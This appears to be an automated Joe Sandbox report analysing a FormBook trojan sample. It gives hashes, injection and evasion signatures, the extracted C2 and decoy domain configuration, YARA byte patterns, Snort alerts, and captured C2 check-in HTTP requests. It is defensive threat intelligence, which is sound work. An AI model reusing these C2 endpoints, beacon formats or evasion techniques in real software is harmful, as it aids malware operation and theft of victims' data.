Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fooYgfbxno

Overview

General Information

Sample Name:fooYgfbxno (renamed file extension from none to exe)
Analysis ID:626604
MD5:ce42fe431b88922ab59b6fd880cadcf6
SHA1:652914d960da1d37d270db7f6e3b07c9d4b0e3a9
SHA256:4d8cc87942499042195cec4fdb2fc5869d4bf98a1d827fd30fb74e82cf0fdc0f
Tags:32exetrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • fooYgfbxno.exe (PID: 6212 cmdline: "C:\Users\user\Desktop\fooYgfbxno.exe" MD5: CE42FE431B88922AB59B6FD880CADCF6)
    • aspnet_compiler.exe (PID: 6324 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • svchost.exe (PID: 1988 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
        • cmd.exe (PID: 5064 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
SourceRuleDescriptionAuthorStrings
00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries
      SourceRuleDescriptionAuthorStrings
      2.0.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.aspnet_compiler.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.aspnet_compiler.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        2.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.aspnet_compiler.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries
          No Sigma rule has matched
          Timestamp:192.168.2.361.14.208.349768802031412 05/14/22-15:30:39.400782
          SID:2031412
          Source Port:49768
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.361.14.208.349768802031453 05/14/22-15:30:39.400782
          SID:2031453
          Source Port:49768
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.361.14.208.349768802031449 05/14/22-15:30:39.400782
          SID:2031449
          Source Port:49768
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
          Source: fooYgfbxno.exeVirustotal: Detection: 31%Perma Link
          Source: fooYgfbxno.exeReversingLabs: Detection: 43%
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.chambaultfleurs.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxTAvira URL Cloud: Label: malware
          Source: http://www.lotsimprovements.com/ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_Avira URL Cloud: Label: malware
          Source: http://www.xn--hj2bz6fwvan2be1g5tb.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8Avira URL Cloud: Label: malware
          Source: http://www.huvao.com/ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_Avira URL Cloud: Label: malware
          Source: www.mentalnayaarifmetika.online/ocgr/Avira URL Cloud: Label: malware
          Source: http://www.mentalnayaarifmetika.online/ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_Avira URL Cloud: Label: malware
          Source: lotsimprovements.comVirustotal: Detection: 7%Perma Link
          Source: fooYgfbxno.exeJoe Sandbox ML: detected
          Source: 2.0.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.aspnet_compiler.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.aspnet_compiler.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: fooYgfbxno.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
          Source: fooYgfbxno.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: fooYgfbxno.exe
          Source: Binary string: THEDEVILISHERE.pdb source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: fooYgfbxno.exe
          Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: aspnet_compiler.pdb source: svchost.exe, 0000000C.00000002.530634745.0000000003E37000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.89.61 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.68.16.179 80
          Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80
          Source: C:\Windows\explorer.exeDomain query: www.lotsimprovements.com
          Source: C:\Windows\explorer.exeNetwork Connect: 209.15.40.102 80
          Source: C:\Windows\explorer.exeDomain query: www.chambaultfleurs.com
          Source: C:\Windows\explorer.exeDomain query: www.zyaxious.website
          Source: C:\Windows\explorer.exeDomain query: www.hofwimmer.com
          Source: C:\Windows\explorer.exeNetwork Connect: 61.14.208.3 80
          Source: C:\Windows\explorer.exeDomain query: www.mentalnayaarifmetika.online
          Source: C:\Windows\explorer.exeDomain query: www.doxofcolor.com
          Source: C:\Windows\explorer.exeNetwork Connect: 206.189.50.60 80
          Source: C:\Windows\explorer.exeDomain query: www.myamazonloan.net
          Source: C:\Windows\explorer.exeDomain query: www.huvao.com
          Source: C:\Windows\explorer.exeDomain query: www.xn--hj2bz6fwvan2be1g5tb.com
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 61.14.208.3:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 61.14.208.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 61.14.208.3:80
          Source: Malware configuration extractorURLs: www.mentalnayaarifmetika.online/ocgr/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: UKRAINE-ASUA UKRAINE-ASUA
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: global trafficHTTP traffic detected: GET /ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.huvao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.mentalnayaarifmetika.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxT HTTP/1.1Host: www.chambaultfleurs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=yHjxPQMm3JcJX2wgLRnbME7+3RpzNlr7I3qSF8qv7PZk+uQof5Nzr3YLke9JRpMCS0ME HTTP/1.1Host: www.hofwimmer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.lotsimprovements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8 HTTP/1.1Host: www.xn--hj2bz6fwvan2be1g5tb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 185.68.16.179 185.68.16.179
          Source: Joe Sandbox ViewIP Address: 213.186.33.5 213.186.33.5
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 14 May 2022 13:30:12 GMTContent-Type: text/htmlContent-Length: 1893Connection: closeETag: "627ea693-765"x-ray: p988:0.001/wn1005:0.000/Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 20 2d 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 63 79 72 69 6c 6c 69 63 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 34 66 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 37 34 37 34 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 32 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 62 72 69 65 66 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 20 70 6f 73 69 74
          Source: svchost.exe, 0000000C.00000002.530690734.0000000003FB2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://adm.tools/support/
          Source: unknownDNS traffic detected: queries for: www.doxofcolor.com
          Source: global trafficHTTP traffic detected: GET /ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.huvao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.mentalnayaarifmetika.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxT HTTP/1.1Host: www.chambaultfleurs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
